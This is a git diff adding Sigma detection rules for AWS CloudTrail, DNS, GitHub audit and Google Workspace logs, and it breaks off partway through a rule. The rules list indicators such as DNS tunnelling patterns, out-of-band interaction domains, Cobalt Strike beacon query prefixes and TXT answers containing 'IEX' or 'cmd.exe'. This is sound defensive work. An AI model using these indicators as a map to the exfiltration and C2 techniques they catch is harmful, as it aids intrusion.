eventName: ModifySnapshotAttribute + condition: selection_source +falsepositives: + - Valid change to a snapshot's permissions +level: medium +tags: + - attack.exfiltration + - attack.t1537 diff --git a/bin/main/rules/cloudtrail/aws_sts_assumerole_misuse.yml b/bin/main/rules/cloudtrail/aws_sts_assumerole_misuse.yml new file mode 100644 index 000000000..1f6b76ae1 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_sts_assumerole_misuse.yml @@ -0,0 +1,29 @@ +title: AWS STS AssumeRole Misuse +id: 905d389b-b853-46d0-9d3d-dea0d3a3cd49 +description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges. +author: Austin Songer @austinsonger +status: experimental +date: 2021/07/24 +modified: 2021/08/20 +references: + - https://github.com/elastic/detection-rules/pull/1214 + - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html +logsource: + product: aws + service: cloudtrail +detection: + selection: + userIdentity.type: AssumedRole + userIdentity.sessionContext.sessionIssuer.type: Role + condition: selection +level: low +tags: + - attack.lateral_movement + - attack.privilege_escalation + - attack.t1548 + - attack.t1550 + - attack.t1550.001 +falsepositives: + - AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Automated processes that uses Terraform may lead to false positives. diff --git a/bin/main/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml b/bin/main/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml new file mode 100644 index 000000000..340e41bc6 --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml @@ -0,0 +1,27 @@ +title: AWS STS GetSessionToken Misuse +id: b45ab1d2-712f-4f01-a751-df3826969807 +description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. +author: Austin Songer @austinsonger +status: experimental +date: 2021/07/24 +references: + - https://github.com/elastic/detection-rules/pull/1213 + - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: sts.amazonaws.com + eventName: GetSessionToken + userIdentity.type: IAMUser + condition: selection +level: low +tags: + - attack.lateral_movement + - attack.privilege_escalation + - attack.t1548 + - attack.t1550 + - attack.t1550.001 +falsepositives: +- GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_susp_saml_activity.yml b/bin/main/rules/cloudtrail/aws_susp_saml_activity.yml new file mode 100644 index 000000000..08eabe4ce --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_susp_saml_activity.yml @@ -0,0 +1,33 @@ +title: AWS Suspicious SAML Activity +id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e +description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. +author: Austin Songer +status: experimental +date: 2021/09/22 +references: + - https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html + - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html +logsource: + product: aws + service: cloudtrail +detection: + selection1: + eventSource: sts.amazonaws.com + eventName: AssumeRoleWithSAML + selection2: + eventSource: iam.amazonaws.com + eventName: UpdateSAMLProvider + condition: selection1 or selection2 +level: medium +tags: + - attack.initial_access + - attack.t1078 + - attack.lateral_movement + - attack.t1548 + - attack.privilege_escalation + - attack.t1550 + - attack.t1550.001 +falsepositives: + - Automated processes that uses Terraform may lead to false positives. + - SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/cloudtrail/aws_update_login_profile.yml b/bin/main/rules/cloudtrail/aws_update_login_profile.yml new file mode 100644 index 000000000..acaebd91d --- /dev/null +++ b/bin/main/rules/cloudtrail/aws_update_login_profile.yml @@ -0,0 +1,31 @@ +title: AWS User Login Profile Was Modified +id: 055fb148-60f8-462d-ad16-26926ce050f1 +status: experimental +description: | + An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. + With this alert, it is used to detect anyone is changing password on behalf of other users. +author: toffeebr33k +date: 2021/08/09 +references: + - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation +logsource: + product: aws + service: cloudtrail +detection: + selection_source: + eventSource: iam.amazonaws.com + eventName: UpdateLoginProfile + filter: + userIdentity.arn|contains: requestParameters.userName + condition: selection_source and not filter +fields: + - userIdentity.arn + - requestParameters.userName + - errorCode + - errorMessage +falsepositives: + - Legit User Account Administration +level: high +tags: + - attack.persistence + - attack.t1098 diff --git a/bin/main/rules/dns/net_dns_c2_detection.yml b/bin/main/rules/dns/net_dns_c2_detection.yml new file mode 100644 index 000000000..bdb1ec4ac --- /dev/null +++ b/bin/main/rules/dns/net_dns_c2_detection.yml @@ -0,0 +1,24 @@ +title: Possible DNS Tunneling +id: 1ec4b281-aa65-46a2-bdae-5fd830ed914e +status: test +description: Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data. +author: Patrick Bareiss +references: + - https://zeltser.com/c2-dns-tunneling/ + - https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/ +date: 2019/04/07 +modified: 2021/11/27 +logsource: + category: dns +detection: + selection: + parent_domain: '*' + condition: selection +falsepositives: + - Valid software, which uses dns for transferring data +level: high +tags: + - attack.command_and_control + - attack.t1071.004 + - attack.exfiltration + - attack.t1048.003 diff --git a/bin/main/rules/dns/net_dns_external_service_interaction_domains.yml b/bin/main/rules/dns/net_dns_external_service_interaction_domains.yml new file mode 100644 index 000000000..6a19e392e --- /dev/null +++ b/bin/main/rules/dns/net_dns_external_service_interaction_domains.yml @@ -0,0 +1,34 @@ +title: DNS Query to External Service Interaction Domains +id: aff715fa-4dd5-497a-8db3-910bea555566 +status: experimental +description: Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE +author: Florian Roth, Matt Kelly (list of domains) +date: 2022/06/07 +references: + - https://twitter.com/breakersall/status/1533493587828260866 +logsource: + category: dns +detection: + selection: + query|contains: + - '.interact.sh' + - '.oast.pro' + - '.oast.live' + - '.oast.site' + - '.oast.online' + - '.oast.fun' + - '.oast.me' + - '.burpcollaborator.net' + - '.oastify.com' + - '.canarytokens.com' + - '.requestbin.net' + - '.dnslog.cn' + condition: selection +falsepositives: + - Unknown +tags: + - attack.initial_access + - attack.t1190 + - attack.reconnaissance + - attack.t1595.002 +level: high diff --git a/bin/main/rules/dns/net_dns_high_bytes_out.yml b/bin/main/rules/dns/net_dns_high_bytes_out.yml new file mode 100644 index 000000000..4b0a9d2a2 --- /dev/null +++ b/bin/main/rules/dns/net_dns_high_bytes_out.yml @@ -0,0 +1,20 @@ +title: High DNS Bytes Out +id: 0f6c1bf5-70a5-4963-aef9-aab1eefb50bd +status: experimental +description: High DNS queries bytes amount from host per short period of time +author: Daniil Yugoslavskiy, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048.003 +logsource: + category: dns +detection: + selection: + query: '*' + timeframe: 1m + condition: selection +falsepositives: + - Legitimate high DNS bytes out rate to domain name which should be added to whitelist +level: medium diff --git a/bin/main/rules/dns/net_dns_high_null_records_requests_rate.yml b/bin/main/rules/dns/net_dns_high_null_records_requests_rate.yml new file mode 100644 index 000000000..32abc9b5d --- /dev/null +++ b/bin/main/rules/dns/net_dns_high_null_records_requests_rate.yml @@ -0,0 +1,22 @@ +title: High NULL Records Requests Rate +id: 44ae5117-9c44-40cf-9c7c-7edad385ca70 +status: test +description: Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution +author: Daniil Yugoslavskiy, oscd.community +date: 2019/10/24 +modified: 2021/11/27 +logsource: + category: dns +detection: + selection: + record_type: 'NULL' + timeframe: 1m + condition: selection +falsepositives: + - Legitimate high DNS NULL requests rate to domain name which should be added to whitelist +level: medium +tags: + - attack.exfiltration + - attack.t1048.003 + - attack.command_and_control + - attack.t1071.004 diff --git a/bin/main/rules/dns/net_dns_high_requests_rate.yml b/bin/main/rules/dns/net_dns_high_requests_rate.yml new file mode 100644 index 000000000..1c6a2fe86 --- /dev/null +++ b/bin/main/rules/dns/net_dns_high_requests_rate.yml @@ -0,0 +1,22 @@ +title: High DNS Requests Rate +id: b4163085-4001-46a3-a79a-55d8bbbc7a3a +status: experimental +description: High DNS requests amount from host per short period of time +author: Daniil Yugoslavskiy, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048.003 + - attack.command_and_control + - attack.t1071.004 +logsource: + category: dns +detection: + selection: + query: '*' + timeframe: 1m + condition: selection +falsepositives: + - Legitimate high DNS requests rate to domain name which should be added to whitelist +level: medium diff --git a/bin/main/rules/dns/net_dns_high_txt_records_requests_rate.yml b/bin/main/rules/dns/net_dns_high_txt_records_requests_rate.yml new file mode 100644 index 000000000..89b0abd13 --- /dev/null +++ b/bin/main/rules/dns/net_dns_high_txt_records_requests_rate.yml @@ -0,0 +1,22 @@ +title: High TXT Records Requests Rate +id: f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35 +status: test +description: Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution +author: Daniil Yugoslavskiy, oscd.community +date: 2019/10/24 +modified: 2021/11/27 +logsource: + category: dns +detection: + selection: + record_type: 'TXT' + timeframe: 1m + condition: selection +falsepositives: + - Legitimate high DNS TXT requests rate to domain name which should be added to whitelist +level: medium +tags: + - attack.exfiltration + - attack.t1048.003 + - attack.command_and_control + - attack.t1071.004 diff --git a/bin/main/rules/dns/net_dns_mal_cobaltstrike.yml b/bin/main/rules/dns/net_dns_mal_cobaltstrike.yml new file mode 100644 index 000000000..64fb1ff74 --- /dev/null +++ b/bin/main/rules/dns/net_dns_mal_cobaltstrike.yml @@ -0,0 +1,26 @@ +title: Cobalt Strike DNS Beaconing +id: 2975af79-28c4-4d2f-a951-9095f229df29 +status: experimental +description: Detects suspicious DNS queries known from Cobalt Strike beacons +author: Florian Roth +date: 2018/05/10 +modified: 2021/03/24 +references: + - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns + - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ +logsource: + category: dns +detection: + selection1: + query|startswith: + - 'aaa.stage.' + - 'post.1' + selection2: + query|contains: '.stage.123456.' + condition: 1 of selection* +falsepositives: + - Unknown +level: critical +tags: + - attack.command_and_control + - attack.t1071.004 diff --git a/bin/main/rules/dns/net_dns_pua_cryptocoin_mining_xmr.yml b/bin/main/rules/dns/net_dns_pua_cryptocoin_mining_xmr.yml new file mode 100644 index 000000000..89ef7001b --- /dev/null +++ b/bin/main/rules/dns/net_dns_pua_cryptocoin_mining_xmr.yml @@ -0,0 +1,41 @@ +title: Monero Crypto Coin Mining Pool Lookup +id: b593fd50-7335-4682-a36c-4edcb68e4641 +status: stable +description: Detects suspicious DNS queries to Monero mining pools +author: Florian Roth +date: 2021/10/24 +references: + - https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/ +logsource: + category: dns +detection: + selection: + query|contains: + - 'pool.minexmr.com' + - 'fr.minexmr.com' + - 'de.minexmr.com' + - 'sg.minexmr.com' + - 'ca.minexmr.com' + - 'us-west.minexmr.com' + - 'pool.supportxmr.com' + - 'mine.c3pool.com' + - 'xmr-eu1.nanopool.org' + - 'xmr-eu2.nanopool.org' + - 'xmr-us-east1.nanopool.org' + - 'xmr-us-west1.nanopool.org' + - 'xmr-asia1.nanopool.org' + - 'xmr-jp1.nanopool.org' + - 'xmr-au1.nanopool.org' + - 'xmr.2miners.com' + - 'xmr.hashcity.org' + - 'xmr.f2pool.com' + - 'xmrpool.eu' + - 'pool.hashvault.pro' + condition: selection +falsepositives: + - Legitimate crypto coin mining +tags: + - attack.impact + - attack.t1496 + - attack.t1567 +level: high diff --git a/bin/main/rules/dns/net_dns_susp_b64_queries.yml b/bin/main/rules/dns/net_dns_susp_b64_queries.yml new file mode 100644 index 000000000..76cbf9663 --- /dev/null +++ b/bin/main/rules/dns/net_dns_susp_b64_queries.yml @@ -0,0 +1,23 @@ +title: Suspicious DNS Query with B64 Encoded String +id: 4153a907-2451-4e4f-a578-c52bb6881432 +status: experimental +description: Detects suspicious DNS queries using base64 encoding +author: Florian Roth +date: 2018/05/10 +modified: 2021/08/09 +references: + - https://github.com/krmaxwell/dns-exfiltration +logsource: + category: dns +detection: + selection: + query|contains: '==.' + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.exfiltration + - attack.t1048.003 + - attack.command_and_control + - attack.t1071.004 diff --git a/bin/main/rules/dns/net_dns_susp_telegram_api.yml b/bin/main/rules/dns/net_dns_susp_telegram_api.yml new file mode 100644 index 000000000..5066a1b2e --- /dev/null +++ b/bin/main/rules/dns/net_dns_susp_telegram_api.yml @@ -0,0 +1,24 @@ +title: Telegram Bot API Request +id: c64c5175-5189-431b-a55e-6d9882158251 +status: experimental +description: Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind +author: Florian Roth +date: 2018/06/05 +modified: 2021/08/09 +references: + - https://core.telegram.org/bots/faq + - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/ + - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/ + - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ +logsource: + category: dns +detection: + selection: + query: 'api.telegram.org' # Telegram Bot API Request https://core.telegram.org/bots/faq + condition: selection +falsepositives: + - Legitimate use of Telegram bots in the company +level: medium +tags: + - attack.command_and_control + - attack.t1102.002 diff --git a/bin/main/rules/dns/net_dns_susp_txt_exec_strings.yml b/bin/main/rules/dns/net_dns_susp_txt_exec_strings.yml new file mode 100644 index 000000000..91533cedc --- /dev/null +++ b/bin/main/rules/dns/net_dns_susp_txt_exec_strings.yml @@ -0,0 +1,26 @@ +title: DNS TXT Answer with Possible Execution Strings +id: 8ae51330-899c-4641-8125-e39f2e07da72 +status: test +description: Detects strings used in command execution in DNS TXT Answer +author: Markus Neis +references: + - https://twitter.com/stvemillertime/status/1024707932447854592 + - https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1 +date: 2018/08/08 +modified: 2021/11/27 +logsource: + category: dns +detection: + selection: + record_type: 'TXT' + answer|contains: + - 'IEX' + - 'Invoke-Expression' + - 'cmd.exe' + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.command_and_control + - attack.t1071.004 diff --git a/bin/main/rules/dns/net_dns_wannacry_killswitch_domain.yml b/bin/main/rules/dns/net_dns_wannacry_killswitch_domain.yml new file mode 100644 index 000000000..9ca3530c5 --- /dev/null +++ b/bin/main/rules/dns/net_dns_wannacry_killswitch_domain.yml @@ -0,0 +1,26 @@ +title: Wannacry Killswitch Domain +id: 3eaf6218-3bed-4d8a-8707-274096f12a18 +status: test +description: Detects wannacry killswitch domain dns queries +author: Mike Wade +references: + - https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html +date: 2020/09/16 +modified: 2022/03/24 +logsource: + category: dns +detection: + selection: + query: + - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.testing' + - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.test' + - 'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com' + - 'ayylmaotjhsstasdfasdfasdfasdfasdfasdfasdf.com' + - 'iuqssfsodp9ifjaposdfjhgosurijfaewrwergwea.com' + condition: selection +falsepositives: + - Analyst testing +level: high +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/github/github_delete_action_invoked.yml b/bin/main/rules/github/github_delete_action_invoked.yml new file mode 100644 index 000000000..7b8e610ba --- /dev/null +++ b/bin/main/rules/github/github_delete_action_invoked.yml @@ -0,0 +1,32 @@ +title: Github Delete Action Invoked +id: 16a71777-0b2e-4db7-9888-9d59cb75200b +status: experimental +description: Detects delete action in the Github audit logs for codespaces, environment, project and repo. +author: Muhammad Faisal +date: 2023/01/19 +references: + - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions +tags: + - attack.impact + - attack.collection + - attack.t1213.003 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action: + - 'codespaces.delete' + - 'environment.delete' + - 'project.delete' + - 'repo.destroy' + condition: selection +fields: + - 'action' + - 'actor' + - 'org' + - 'actor_location.country_code' +falsepositives: + - Validate the deletion activity is permitted. The "actor" field need to be validated. +level: medium diff --git a/bin/main/rules/github/github_disable_high_risk_configuration.yml b/bin/main/rules/github/github_disable_high_risk_configuration.yml new file mode 100644 index 000000000..9a657fd34 --- /dev/null +++ b/bin/main/rules/github/github_disable_high_risk_configuration.yml @@ -0,0 +1,40 @@ +title: Github High Risk Configuration Disabled +id: 8622c92d-c00e-463c-b09d-fd06166f6794 +status: experimental +description: Detects when a user disables a critical security feature for an organization. +author: Muhammad Faisal +date: 2023/01/29 +references: + - https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization + - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions + - https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository +tags: + - attack.credential_access + - attack.defense_evasion + - attack.persistence + - attack.t1556 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action: + - 'org.disable_oauth_app_restrictions' + - 'org.disable_two_factor_requirement' + - 'repo.advanced_security_disabled' + - 'org.advanced_security_policy_selected_member_disabled' + condition: selection +fields: + - 'action' + - 'actor' + - 'org' + - 'actor_location.country_code' + - 'transport_protocol_name' + - 'repository' + - 'repo' + - 'repository_public' + - '@timestamp' +falsepositives: + - Approved administrator/owner activities. +level: high diff --git a/bin/main/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml b/bin/main/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml new file mode 100644 index 000000000..02052af78 --- /dev/null +++ b/bin/main/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml @@ -0,0 +1,40 @@ +title: Outdated Dependency Or Vulnerability Alert Disabled +id: 34e1c7d4-0cd5-419d-9f1b-1dad3f61018d +status: experimental +description: | + Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts. + This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories. +author: Muhammad Faisal +date: 2023/01/27 +references: + - https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts + - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization +tags: + - attack.initial_access + - attack.t1195.001 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action: + - 'dependabot_alerts.disable' + - 'dependabot_alerts_new_repos.disable' + - 'dependabot_security_updates.disable' + - 'dependabot_security_updates_new_repos.disable' + - 'repository_vulnerability_alerts.disable' + condition: selection +fields: + - 'action' + - 'actor' + - 'org' + - 'actor_location.country_code' + - 'transport_protocol_name' + - 'repository' + - 'repo' + - 'repository_public' + - '@timestamp' +falsepositives: + - Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes. +level: high diff --git a/bin/main/rules/github/github_new_org_member.yml b/bin/main/rules/github/github_new_org_member.yml new file mode 100644 index 000000000..384d64330 --- /dev/null +++ b/bin/main/rules/github/github_new_org_member.yml @@ -0,0 +1,34 @@ +title: New Github Organization Member Added +id: 3908d64a-3c06-4091-b503-b3a94424533b +status: experimental +description: Detects when a new member is added or invited to a github organization. +author: Muhammad Faisal +date: 2023/01/29 +references: + - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions +tags: + - attack.persistence + - attack.t1136.003 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action: + - 'org.add_member' + - 'org.invite_member' + condition: selection +fields: + - 'action' + - 'actor' + - 'org' + - 'actor_location.country_code' + - 'transport_protocol_name' + - 'repository' + - 'repo' + - 'repository_public' + - '@timestamp' +falsepositives: + - Organization approved new members +level: informational diff --git a/bin/main/rules/github/github_new_secret_created.yml b/bin/main/rules/github/github_new_secret_created.yml new file mode 100644 index 000000000..105a8b6d0 --- /dev/null +++ b/bin/main/rules/github/github_new_secret_created.yml @@ -0,0 +1,34 @@ +title: Github New Secret Created +id: f9405037-bc97-4eb7-baba-167dad399b83 +status: experimental +description: Detects when a user creates action secret for the organization, environment, codespaces or repository. +author: Muhammad Faisal +date: 2023/01/20 +references: + - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions +tags: + - attack.defense_evasion + - attack.persistence + - attack.privilege_escalation + - attack.initial_access + - attack.t1078.004 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action: + - 'org.create_actions_secret' + - 'environment.create_actions_secret' + - 'codespaces.create_an_org_secret' + - 'repo.create_actions_secret' + condition: selection +fields: + - 'action' + - 'actor' + - 'org' + - 'actor_location.country_code' +falsepositives: + - This detection cloud be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the "actor". +level: low diff --git a/bin/main/rules/github/github_outside_collaborator_detected.yml b/bin/main/rules/github/github_outside_collaborator_detected.yml new file mode 100644 index 000000000..fbd16b49e --- /dev/null +++ b/bin/main/rules/github/github_outside_collaborator_detected.yml @@ -0,0 +1,35 @@ +title: Github Outside Collaborator Detected +id: eaa9ac35-1730-441f-9587-25767bde99d7 +status: experimental +description: | + Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA. +author: Muhammad Faisal +date: 2023/01/20 +references: + - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions + - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization +tags: + - attack.persistence + - attack.collection + - attack.t1098.001 + - attack.t1098.003 + - attack.t1213.003 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action: + - 'project.update_user_permission' + - 'org.remove_outside_collaborator' + condition: selection +fields: + - 'action' + - 'actor' + - 'org' + - 'actor_location.country_code' +falsepositives: + - Validate the actor if permitted to access the repo. + - Validate the Multifactor Authentication changes. +level: medium diff --git a/bin/main/rules/github/github_self_hosted_runner_changes_detected.yml b/bin/main/rules/github/github_self_hosted_runner_changes_detected.yml new file mode 100644 index 000000000..7dc420524 --- /dev/null +++ b/bin/main/rules/github/github_self_hosted_runner_changes_detected.yml @@ -0,0 +1,55 @@ +title: Github Self Hosted Runner Changes Detected +id: f8ed0e8f-7438-4b79-85eb-f358ef2fbebd +status: experimental +description: | + A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. + This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, + it should be validated from GitHub UI because the log entry may not provide full context. +author: Muhammad Faisal +date: 2023/01/27 +references: + - https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners + - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation +tags: + - attack.impact + - attack.discovery + - attack.collection + - attack.defense_evasion + - attack.persistence + - attack.privilege_escalation + - attack.initial_access + - attack.t1526 + - attack.t1213.003 + - attack.t1078.004 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action: + - 'org.remove_self_hosted_runner' + - 'org.runner_group_created' + - 'org.runner_group_removed' + - 'org.runner_group_updated' + - 'org.runner_group_runners_added' + - 'org.runner_group_runner_removed' + - 'org.runner_group_runners_updated' + - 'repo.register_self_hosted_runner' + - 'repo.remove_self_hosted_runner' + condition: selection +fields: + - 'action' + - 'actor' + - 'org' + - 'actor_location.country_code' + - 'transport_protocol_name' + - 'repository' + - 'repo' + - 'repository_public' + - '@timestamp' +falsepositives: + - Allowed self-hosted runners changes in the environment. + - A self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 14 days. + - An ephemeral self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 1 day. +level: low diff --git a/bin/main/rules/gworkspace/gworkspace_application_removed.yml b/bin/main/rules/gworkspace/gworkspace_application_removed.yml new file mode 100644 index 000000000..9f0a63994 --- /dev/null +++ b/bin/main/rules/gworkspace/gworkspace_application_removed.yml @@ -0,0 +1,26 @@ +title: Google Workspace Application Removed +id: ee2803f0-71c8-4831-b48b-a1fc57601ee4 +status: test +description: Detects when an an application is removed from Google Workspace. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST +author: Austin Songer +date: 2021/08/26 +modified: 2022/10/09 +tags: + - attack.impact +logsource: + product: google_workspace + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - REMOVE_APPLICATION + - REMOVE_APPLICATION_FROM_WHITELIST + condition: selection +falsepositives: + - Application being removed may be performed by a System Administrator. +level: medium diff --git a/bin/main/rules/gworkspace/gworkspace_granted_domain_api_access.yml b/bin/main/rules/gworkspace/gworkspace_granted_domain_api_access.yml new file mode 100644 index 000000000..ea14ab20b --- /dev/null +++ b/bin/main/rules/gworkspace/gworkspace_granted_domain_api_access.yml @@ -0,0 +1,25 @@ +title: Google Workspace Granted Domain API Access +id: 04e2a23a-9b29-4a5c-be3a-3542e3f982ba +status: test +description: Detects when an API access service account is granted domain authority. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS +author: Austin Songer +date: 2021/08/23 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1098 +logsource: + product: google_workspace + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: AUTHORIZE_API_CLIENT_ACCESS + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/bin/main/rules/gworkspace/gworkspace_mfa_disabled.yml b/bin/main/rules/gworkspace/gworkspace_mfa_disabled.yml new file mode 100644 index 000000000..f5e988115 --- /dev/null +++ b/bin/main/rules/gworkspace/gworkspace_mfa_disabled.yml @@ -0,0 +1,28 @@ +title: Google Workspace MFA Disabled +id: 780601d1-6376-4f2a-884e-b8d45599f78c +status: test +description: Detects when multi-factor authentication (MFA) is disabled. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION +author: Austin Songer +date: 2021/08/26 +modified: 2022/12/25 +tags: + - attack.impact +logsource: + product: google_workspace + service: 